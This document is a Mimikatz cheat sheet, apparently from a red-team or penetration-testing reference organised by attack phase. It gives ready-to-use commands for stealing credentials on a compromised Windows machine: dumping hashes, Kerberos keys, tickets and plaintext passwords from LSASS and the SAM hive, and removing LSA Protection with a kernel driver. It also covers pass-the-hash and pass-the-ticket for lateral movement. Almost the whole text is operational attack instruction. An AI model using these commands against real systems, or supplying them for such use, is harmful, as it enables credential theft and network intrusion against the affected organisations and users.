Mimikatz is a tool for extracting credentials (NT hashes, Kerberos tickets and keys, and plaintext passwords where Windows still caches them) from a compromised machine and reusing them. Most commands need a high-integrity (elevated) process or SYSTEM, plus SeDebugPrivilege to open LSASS.

Usage

Acquiring Privilege

  • privilege::debug (enable SeDebugPrivilege on the current token; needed to open LSASS for the sekurlsa:: commands and for token::elevate; only succeeds from a high-integrity process)
  • token::elevate (impersonate a SYSTEM token if not already SYSTEM; needed for lsadump::sam, because the SAM hive is readable only by SYSTEM; undo with token::revert)

Dumping Credentials

07-credential-access

  • lsadump::sam (dump NT hashes of local accounts from the SAM hive via the registry; this is not LSASS and not a cache; requires SYSTEM, so run token::elevate first, or point it at exported hives with /sam:SAM /system:SYSTEM)
  • lsadump::lsa [ /patch | /inject ] (dump account hashes through LSA; /patch patches LSASS in memory so it returns NT hashes, /inject injects into LSASS and also returns supplemental credentials such as Kerberos keys; on a DC this covers every domain account, which is where /inject is the usual choice; run after privilege::debug)
  • sekurlsa::logonpasswords (dump the credential material of every logon session held in LSASS: NT hashes, Kerberos keys, and plaintext passwords where WDigest caching is on; this includes remote and network logons, not only the console user; requires privilege::debug)
    • If LSA Protection (RunAsPPL) is enabled, LSASS cannot be opened from user mode: load the signed mimidrv.sys kernel driver as a service (`!+`), strip the protection with `!processprotect /process:lsass.exe /remove`, then retry. Loading the driver needs SeLoadDriverPrivilege, generates a driver-load event, and may be blocked by driver blocklists or HVCI.
  • sekurlsa::msv (only the MSV1_0 part of logonpasswords: the NT/LM hashes of each logon session, local and domain users alike)
  • kerberos::list /export (list the current logon session's Kerberos tickets and write each one to a .kirbi file; uses the normal Kerberos API, so no elevation is needed)
  • sekurlsa::tickets /export (dump the tickets of all logon sessions from LSASS and export them as .kirbi files; requires privilege::debug; in the output, “TGT” is a ticket-granting ticket and “TGS” entries are service tickets issued by the ticket-granting service)
  • sekurlsa::ekeys (dump the Kerberos encryption keys (AES256, AES128, RC4, which equals the NT hash) of each logon session; requires privilege::debug; the AES keys can be replayed with sekurlsa::pth /aes256: instead of /ntlm:)

Using Credentials

09-lateral-movement

  • sekurlsa::pth (pass-the-hash, or overpass-the-hash with an AES key: start a process whose logon session carries the supplied secret, so its outbound NTLM or Kerberos authentication happens as that user; whoami in the new process still shows the original account, only network authentication changes)
    • Format: sekurlsa::pth /user:DOMAIN_USER /domain:DOMAIN /ntlm:NTLM_HASH /run:COMMAND (/aes256:KEY or /aes128:KEY can replace /ntlm: for Kerberos-only authentication)
    • Needs privilege::debug, since it writes into LSASS, but run it from your own token rather than while impersonating SYSTEM via token::elevate: use token::revert first, because the new process is created from the impersonated token and pass-the-hash with an elevated token does not work.
  • kerberos::ptt TICKET.kirbi (inject a .kirbi ticket into the current logon session; no elevation needed; confirm with kerberos::list or the built-in klist)

Miscellaneous

  • kerberos::purge (discard all Kerberos tickets in the current logon session, e.g. before kerberos::ptt so the injected ticket is the one used, or to clean up afterwards; same effect as the built-in klist purge)